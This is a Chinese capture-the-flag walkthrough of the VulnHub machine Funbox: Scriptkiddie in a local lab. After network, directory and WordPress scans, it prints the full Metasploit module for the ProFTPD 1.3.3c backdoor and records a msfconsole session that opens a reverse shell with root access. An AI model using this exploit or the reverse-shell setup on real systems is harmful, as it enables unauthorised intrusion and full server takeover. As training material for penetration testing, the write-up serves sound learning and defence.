免责声明:本文记录的是 Funbox: Scriptkiddie 渗透测试靶机 的解题过程,所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用,请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规,自觉维护网络空间安全。
环境:
https://download.vulnhub.com/funbox/Funbox11.ova一、信息收集
1、探测目标IP地址
arp-scan -l #探测当前网段的所有ip地址┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.11
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.5.1 0a:00:27:00:00:04 (Unknown: locally administered)
192.168.5.2 08:00:27:e0:71:d3 PCS Systemtechnik GmbH
192.168.5.14 08:00:27:99:7a:37 PCS Systemtechnik GmbH
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.953 seconds (131.08 hosts/sec). 3 responded
nmap -sP 192.168.5.0/24┌──(root㉿kali)-[~]
└─# nmap -sP 192.168.5.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-11 08:29 -0400
Nmap scan report for 192.168.5.1
Host is up (0.00023s latency).
MAC Address: 0A:00:27:00:00:04 (Unknown)
Nmap scan report for 192.168.5.2
Host is up (0.00019s latency).
MAC Address: 08:00:27:E0:71:D3 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.5.14
Host is up (0.00039s latency).
MAC Address: 08:00:27:99:7A:37 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.5.11
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.01 seconds目标IP:192.168.5.142、探测目标IP开放端口
nmap -sV -p- 192.168.5.14┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.5.14
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-11 08:29 -0400
Nmap scan report for 192.168.5.14
Host is up (0.000078s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:99:7A:37 (Oracle VirtualBox virtual NIC)
Service Info: Hosts: funbox11, FUNBOX11; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
端口:21、22、25、80、110、139、143、4453、目录探测
dirsearch -u http://192.168.5.14┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.5.14
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /root/reports/http_192.168.5.14/_26-03-11_08-31-29.txt
Target: http://192.168.5.14/
[08:31:29] Starting:
[08:31:31] 403 - 277B - /.ht_wsr.txt
[08:31:31] 403 - 277B - /.htaccess.bak1
[08:31:31] 403 - 277B - /.htaccess.orig
[08:31:31] 403 - 277B - /.htaccess.sample
[08:31:31] 403 - 277B - /.htaccess.save
[08:31:31] 403 - 277B - /.htaccess_extra
[08:31:31] 403 - 277B - /.htaccess_orig
[08:31:31] 403 - 277B - /.htaccessBAK
[08:31:31] 403 - 277B - /.htaccess_sc
[08:31:31] 403 - 277B - /.htaccessOLD
[08:31:31] 403 - 277B - /.htaccessOLD2
[08:31:31] 403 - 277B - /.html
[08:31:31] 403 - 277B - /.htm
[08:31:31] 403 - 277B - /.htpasswd_test
[08:31:31] 403 - 277B - /.httr-oauth
[08:31:31] 403 - 277B - /.htpasswds
[08:31:31] 403 - 277B - /.php
[08:31:31] 403 - 277B - /.php3
[08:31:48] 301 - 0B - /index.php -> http://192.168.5.14/
[08:31:49] 404 - 8KB - /index.php/login/
[08:31:50] 200 - 7KB - /license.txt
[08:31:58] 200 - 3KB - /readme.html
[08:31:59] 403 - 277B - /server-status
[08:31:59] 403 - 277B - /server-status/
[08:32:07] 301 - 315B - /wp-admin -> http://192.168.5.14/wp-admin/
[08:32:07] 200 - 0B - /wp-config.php
[08:32:07] 302 - 0B - /wp-admin/ -> http://funbox11/wp-login.php?redirect_to=http%3A%2F%2F192.168.5.14%2Fwp-admin%2F&reauth=1
[08:32:07] 400 - 1B - /wp-admin/admin-ajax.php
[08:32:07] 200 - 507B - /wp-admin/install.php
[08:32:07] 409 - 3KB - /wp-admin/setup-config.php
[08:32:07] 301 - 317B - /wp-content -> http://192.168.5.14/wp-content/
[08:32:07] 200 - 0B - /wp-content/
[08:32:07] 200 - 84B - /wp-content/plugins/akismet/akismet.php
[08:32:07] 500 - 0B - /wp-content/plugins/hello.php
[08:32:07] 200 - 478B - /wp-content/uploads/
[08:32:07] 200 - 416B - /wp-content/upgrade/
[08:32:07] 301 - 318B - /wp-includes -> http://192.168.5.14/wp-includes/
[08:32:07] 200 - 0B - /wp-includes/rss-functions.php
[08:32:07] 200 - 4KB - /wp-includes/
[08:32:07] 200 - 0B - /wp-cron.php
[08:32:07] 200 - 2KB - /wp-login.php
[08:32:07] 302 - 0B - /wp-signup.php -> http://funbox11/wp-login.php?action=register
[08:32:08] 405 - 42B - /xmlrpc.php
Task Completeddirb http://192.168.5.14┌──(root㉿kali)-[~]
└─# dirb http://192.168.5.14
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Mar 11 08:33:12 2026
URL_BASE: http://192.168.5.14/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.5.14/ ----
+ http://192.168.5.14/index.php (CODE:301|SIZE:0)
+ http://192.168.5.14/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://192.168.5.14/wp-admin/
==> DIRECTORY: http://192.168.5.14/wp-content/
==> DIRECTORY: http://192.168.5.14/wp-includes/
+ http://192.168.5.14/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.5.14/wp-admin/ ----
+ http://192.168.5.14/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.5.14/wp-admin/css/
==> DIRECTORY: http://192.168.5.14/wp-admin/images/
==> DIRECTORY: http://192.168.5.14/wp-admin/includes/
+ http://192.168.5.14/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.5.14/wp-admin/js/
==> DIRECTORY: http://192.168.5.14/wp-admin/maint/
==> DIRECTORY: http://192.168.5.14/wp-admin/network/
==> DIRECTORY: http://192.168.5.14/wp-admin/user/
---- Entering directory: http://192.168.5.14/wp-content/ ----
+ http://192.168.5.14/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.5.14/wp-content/languages/
==> DIRECTORY: http://192.168.5.14/wp-content/plugins/
==> DIRECTORY: http://192.168.5.14/wp-content/themes/
==> DIRECTORY: http://192.168.5.14/wp-content/upgrade/
==> DIRECTORY: http://192.168.5.14/wp-content/uploads/
---- Entering directory: http://192.168.5.14/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.14/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.14/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.14/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.14/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.14/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.14/wp-admin/network/ ----
+ http://192.168.5.14/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.5.14/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.5.14/wp-admin/user/ ----
+ http://192.168.5.14/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.5.14/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.5.14/wp-content/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.14/wp-content/plugins/ ----
+ http://192.168.5.14/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.5.14/wp-content/themes/ ----
+ http://192.168.5.14/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.5.14/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.14/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Mar 11 08:33:20 2026
DOWNLOADED: 32284 - FOUND: 12gobuster dir -u http://192.168.5.14 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.5.14 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.5.14
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 317] [--> http://192.168.5.14/wp-content/]
/index.php (Status: 301) [Size: 0] [--> http://192.168.5.14/]
/wp-includes (Status: 301) [Size: 318] [--> http://192.168.5.14/wp-includes/]
/wp-login.php (Status: 200) [Size: 7339]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-admin (Status: 301) [Size: 315] [--> http://192.168.5.14/wp-admin/]
/xmlrpc.php (Status: 405) [Size: 42]
/wp-signup.php (Status: 302) [Size: 0] [--> http://funbox11/wp-login.php?action=register]
/server-status (Status: 403) [Size: 277]
Progress: 441116 / 441116 (100.00%)
===============================================================
Finished
===============================================================
二、漏洞利用
1、信息搜集
192.168.5.14
在主页点击MOUNT FUJI!
靶机描述中提到我们添加域名解析
Description
As always, it’s a very easy box for beginners.
Add to your /etc/hosts: funbox11
This works better with VirtualBox rather than VMware.192.168.5.14 funbox112、wpscan扫描
wpscan --url http://funbox11/ --enumerate u┌──(root㉿kali)-[~]
└─# wpscan --url http://funbox11/ --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.28
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://funbox11/ [192.168.5.14]
[+] Started: Wed Mar 11 08:49:05 2026
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://funbox11/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://funbox11/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://funbox11/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://funbox11/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.7.2 identified (Insecure, released on 2021-05-12).
| Found By: Rss Generator (Passive Detection)
| - http://funbox11/index.php/feed/, <generator>https://wordpress.org/?v=5.7.2</generator>
| - http://funbox11/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.7.2</generator>
[+] WordPress theme in use: block-lite
| Location: http://funbox11/wp-content/themes/block-lite/
| Last Updated: 2022-05-30T00:00:00.000Z
| Readme: http://funbox11/wp-content/themes/block-lite/README.txt
| [!] The version is out of date, the latest version is 1.3
| Style URL: http://funbox11/wp-content/themes/block-lite/style.css?ver=5.7.2
| Style Name: Block Lite
| Style URI: https://organicthemes.com/theme/block-lite/
| Description: The Block Lite theme features a modern and responsive design with a block style layout for blog post...
| Author: Organic Themes
| Author URI: https://organicthemes.com
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://funbox11/wp-content/themes/block-lite/style.css?ver=5.7.2, Match: 'Version: 1.2.2'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==========> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://funbox11/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Mar 11 08:49:09 2026
[+] Requests Done: 54
[+] Cached Requests: 6
[+] Data Sent: 12.984 KB
[+] Data Received: 192.543 KB
[+] Memory used: 189.039 MB
[+] Elapsed time: 00:00:03得出admin用户
3、枚举密码
wpscan --url http://funbox11/ --passwords /usr/share/wordlists/rockyou.txt --usernames admin枚举失败
4、ProFTPD 1.3.3c 后门命令执行漏洞
searchsploit ProFTPD 1.3.3c
searchsploit -m 16921.rb
cat 16921.rb ┌──(root㉿kali)-[~]
└─# searchsploit ProFTPD 1.3.3c
------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------ ---------------------------------
ProFTPd 1.3.3c - Compromised Source Backdoor Remote C | linux/remote/15662.txt
ProFTPd-1.3.3c - Backdoor Command Execution (Metasplo | linux/remote/16921.rb
------------------------------------------------------ ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[~]
└─# searchsploit -m 16921.rb
Exploit: ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)
URL: https://www.exploit-db.com/exploits/16921
Path: /usr/share/exploitdb/exploits/linux/remote/16921.rb
Codes: OSVDB-69562
Verified: True
File Type: Ruby script, ASCII text
Copied to: /root/16921.rb
┌──(root㉿kali)-[~]
└─# cat 16921.rb
##
# $Id: proftpd_133c_backdoor.rb 11214 2010-12-03 12:34:38Z swtornio $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'ProFTPD-1.3.3c Backdoor Command Execution',
'Description' => %q{
This module exploits a malicious backdoor that was added to the
ProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz]
archive between November 28th 2010 and 2nd December 2010.
},
'Author' => [ 'MC', 'darkharper2' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 11214 $',
'References' =>
[
[ 'OSVDB', '69562'],
[ 'BID', '45150' ],
[ 'URL', 'http://sourceforge.net/mailarchive/message.php?msg_name=alpine.DEB.2.00.1012011542220.12930%40familiar.castaglia.org' ],
],
'Privileged' => true,
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 2000,
'BadChars' => '',
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' =>
[
[ 'Automatic', { } ],
],
'DisclosureDate' => 'Dec 2 2010',
'DefaultTarget' => 0))
deregister_options('FTPUSER', 'FTPPASS')
end
def exploit
connect
print_status("Sending Backdoor Command")
sock.put("HELP ACIDBITCHEZ\r\n")
res = sock.get_once(-1,10)
if ( res and res =~ /502/ )
print_error("Not backdoored")
else
sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")
handler
end
disconnect
end
end 5、Exp
# 启动Metasploit框架的命令行界面
msfconsole
# 选择使用针对ProFTPD 1.3.3c版本的后门漏洞利用模块
use exploit/unix/ftp/proftpd_133c_backdoor
# 设置目标主机IP地址(受害者)
set rhost 192.168.5.14
# 设置攻击载荷为Unix命令反向Shell
set payload payload/cmd/unix/reverse
# 设置本地主机IP地址(攻击者监听IP)
set lhost 192.168.5.11
# 执行攻击
exploit┌──(root㉿kali)-[~]
└─# msfconsole
Metasploit tip: Metasploit can be configured at startup, see msfconsole
--help to learn more
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
.dOOo'WM.OOOOocccxOOOO.MX'xOOd.
,kOl'M.OOOOOOOOOOOOO.M'dOk,
:kk;.OOOOOOOOOOOOO.;Ok:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v6.4.103-dev ]
+ -- --=[ 2,584 exploits - 1,319 auxiliary - 1,694 payloads ]
+ -- --=[ 433 post - 49 encoders - 14 nops - 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project
msf > use exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 192.168.5.14
rhost => 192.168.5.14
msf exploit(unix/ftp/proftpd_133c_backdoor) >
msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload payload/cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(unix/ftp/proftpd_133c_backdoor) >
msf exploit(unix/ftp/proftpd_133c_backdoor) > set lhost 192.168.5.11
lhost => 192.168.5.11
msf exploit(unix/ftp/proftpd_133c_backdoor) >
msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[*] Started reverse TCP double handler on 192.168.5.11:4444
[*] 192.168.5.14:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo DlOaSFpWZByPVTk9;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "DlOaSFpWZByPVTk9\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.5.11:4444 -> 192.168.5.14:44482) at 2026-03-11 08:56:35 -0400
id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
whoami
root
cd /root
ls
root.txt
cat root.txt
$$$$$$$$\ $$\
$$ _____| $$ |
$$ | $$\ $$\ $$$$$$$\ $$$$$$$\ $$$$$$\ $$\ $$\ $$\
$$$$$\ $$ | $$ |$$ __$$\ $$ __$$\ $$ __$$\ \$$\ $$ |\__|
$$ __|$$ | $$ |$$ | $$ |$$ | $$ |$$ / $$ | \$$$$ /
$$ | $$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ | $$ $$< $$\
$$ | \$$$$$$ |$$ | $$ |$$$$$$$ |\$$$$$$ |$$ /\$$\ \__|
\__| \______/ \__| \__|\_______/ \______/ \__/ \__|
$$$$$$\ $$\ $$\ $$\ $$\ $$\ $$\ $$\
$$ __$$\ \__| $$ | $$ | \__| $$ | $$ |\__|
$$ / \__| $$$$$$$\ $$$$$$\ $$\ $$$$$$\ $$$$$$\ $$ | $$\ $$\ $$$$$$$ | $$$$$$$ |$$\ $$$$$$\
\$$$$$$\ $$ _____|$$ __$$\ $$ |$$ __$$\\_$$ _| $$ | $$ |$$ |$$ __$$ |$$ __$$ |$$ |$$ __$$\
\____$$\ $$ / $$ | \__|$$ |$$ / $$ | $$ | $$$$$$ / $$ |$$ / $$ |$$ / $$ |$$ |$$$$$$$$ |
$$\ $$ |$$ | $$ | $$ |$$ | $$ | $$ |$$\ $$ _$$< $$ |$$ | $$ |$$ | $$ |$$ |$$ ____|
\$$$$$$ |\$$$$$$$\ $$ | $$ |$$$$$$$ | \$$$$ |$$ | \$$\ $$ |\$$$$$$$ |\$$$$$$$ |$$ |\$$$$$$$\
\______/ \_______|\__| \__|$$ ____/ \____/ \__| \__|\__| \_______| \_______|\__| \_______|
$$ |
$$ |
\__|
Please, tweet this to: @0815R2d2
Thank you...成功提权后,在root目录下**root.txt**拿到flag
id
whoami
cd /root
ls
cat root.txtmsf exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[*] Started reverse TCP double handler on 192.168.5.11:4444
[*] 192.168.5.14:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo DlOaSFpWZByPVTk9;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "DlOaSFpWZByPVTk9\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.5.11:4444 -> 192.168.5.14:44482) at 2026-03-11 08:56:35 -0400
id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
whoami
root
cd /root
ls
root.txt
cat root.txt
$$$$$$$$\ $$\
$$ _____| $$ |
$$ | $$\ $$\ $$$$$$$\ $$$$$$$\ $$$$$$\ $$\ $$\ $$\
$$$$$\ $$ | $$ |$$ __$$\ $$ __$$\ $$ __$$\ \$$\ $$ |\__|
$$ __|$$ | $$ |$$ | $$ |$$ | $$ |$$ / $$ | \$$$$ /
$$ | $$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ | $$ $$< $$\
$$ | \$$$$$$ |$$ | $$ |$$$$$$$ |\$$$$$$ |$$ /\$$\ \__|
\__| \______/ \__| \__|\_______/ \______/ \__/ \__|
$$$$$$\ $$\ $$\ $$\ $$\ $$\ $$\ $$\
$$ __$$\ \__| $$ | $$ | \__| $$ | $$ |\__|
$$ / \__| $$$$$$$\ $$$$$$\ $$\ $$$$$$\ $$$$$$\ $$ | $$\ $$\ $$$$$$$ | $$$$$$$ |$$\ $$$$$$\
\$$$$$$\ $$ _____|$$ __$$\ $$ |$$ __$$\\_$$ _| $$ | $$ |$$ |$$ __$$ |$$ __$$ |$$ |$$ __$$\
\____$$\ $$ / $$ | \__|$$ |$$ / $$ | $$ | $$$$$$ / $$ |$$ / $$ |$$ / $$ |$$ |$$$$$$$$ |
$$\ $$ |$$ | $$ | $$ |$$ | $$ | $$ |$$\ $$ _$$< $$ |$$ | $$ |$$ | $$ |$$ |$$ ____|
\$$$$$$ |\$$$$$$$\ $$ | $$ |$$$$$$$ | \$$$$ |$$ | \$$\ $$ |\$$$$$$$ |\$$$$$$$ |$$ |\$$$$$$$\
\______/ \_______|\__| \__|$$ ____/ \____/ \__| \__|\__| \_______| \_______|\__| \_______|
$$ |
$$ |
\__|
Please, tweet this to: @0815R2d2
Thank you...本文涉及的技术方法仅适用于 授权测试环境 或 合法 CTF 赛事。请勿在未授权的情况下对任何系统进行测试。安全之路,始于合规,终于责任。